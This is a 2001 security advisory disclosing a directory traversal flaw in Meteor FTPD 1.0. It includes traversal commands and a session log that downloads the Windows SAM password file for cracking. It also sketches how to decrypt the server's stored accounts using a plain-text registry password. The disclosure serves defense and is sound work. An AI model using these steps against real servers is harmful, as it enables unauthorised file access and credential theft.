------------------------------------------------------------------------------------------------
Cartel Informatique - Security Advisory
Topic: Meteor FTPD 1.0 Directory Traversal
Advisory ID: CARTSA-2001-03
Public Disclosure: 2001-09-27
Author Contacted: 2001-09-15=20
Product: Meteor FTPD 1.0
Credits: Nicolas Brulez - Brulez@cartel-info.fr
------------------------------------------------------------------------------------------------
Vendor Affected:
================
Charles Clark - meteorsoft@hotmail.com
Freeware
"Meteor FTP is a personal FTP server designed for the Microsoft Windows
98 and Windows Millenium Edition operating systems."
Note from the author:
================
"Be aware that any FTP server can present security vulnerabilities on the
computer on which it runs, potentially allowing access to system
resources beyond those intended by the system operator.
For this reason Meteor FTP is NOT recommended for use on systems
hosting sensitive files such as financial records, etc."
True, and this server is vulnerable.
Problem:
=======
Cartel security team has found a Directory Traversal bug in the meteor
FTP server, allowing remote users to browse through any directory on the
victim's hard drive or list files outside the root directory.
This is possible by sending commands like:
ls ../*
ls /../*
ls .../*
cd ...
Example:
========
220 Service ready for new user
Utilisateur (192.168.160.3:(none)) : nbz
331 User name okay, need password
Mot de passe :
230- Meteor FTP Version 1.0
230 User logged in, proceed
ftp> ls ../winnt/repair/*
200 Command OK
150 About to open data connection
.
..
setup.log
secsetup.inf
system
software
default
security
sam
ntuser.dat
autoexec.nt
config.nt
226 Closing data connection. Requested file action successful.
ftp : 110 octets reçus dans 0,02Secondes 5,50Ko/sec.
ftp> get ../winnt/repair/sam sam2crack
200 Command OK
150 About to open data connection
226 Closing data connection. Requested file action successful.
ftp : 20480 octets reçus dans 0,01Secondes 2048,00Ko/sec.
ftp> ls ../*
..
We wouldn't do it if we weren't logged as administrator tho.
That's why, FTPD need to be started with user privilege.
ftp> cd ..
501 Directory .. does not exist
ftp> cd ...
250 ... is current working directory
ftp> ls
Extra notes:
=========
The FTP server seems to behave differently on Win2K and win9X.
Some commands work under an OS, some doesn't.
But you can exploit the FTP server on both OS anyway :)
The server asks us a password to encrypt the login/password file.
This password can be found in the registry in plain text..
With this attack, it is easy to imagine a way to get it from the
registry and to decrypt all the accounts(once we leeched it with the
directory traversal bug).
A computer dependant password, based on the hard disk serial for
exemple would be more secure, and at least , better than a plain text one.
I suggest to hash the HD serial and use it as password without using it
in the registry of course. else it is pointless.Some algo at start
without any use of the registry.
Imagine an attacker getting the login file.He just have to install the
server on his own computer,put the crypted login file,enter the password he
leeched from the compromised computer, and he can have all
users/password.
With the hash trick, its own box won't decrypt it properly,because of a
different hash value, based on the HD serial.
Status:
=======
Author made a Fix.
Fix:
====
Get New version as soon as it is public.
Greetings to my friends at:
===========================
USSR, Hert, Vauban systems and qualys.
About:
======
Cartel is a company based in France, dedicated to Research about
network
security and application security systems.
Security services provided are :
- Firewalls testing
- Network Penetration Testing
- Application Security Testing
- Data protecting
- Intrusion Detection systems
- Binary auditing
- Secure Web hosting
- Antivirus
- PKI
- VPN
Copyright (c) Cartel informatique Security Research LABS.
This Document is copyrighted.you can't modify it without explicit consent
of CARTEL LABS.Feel free to publish it on any security site.
For more informations, feel free to contact us.
Cartel info security research labs
mail: srl@cartel-info.fr or Brulez@cartel-info.fr
http://cartel-info.fr
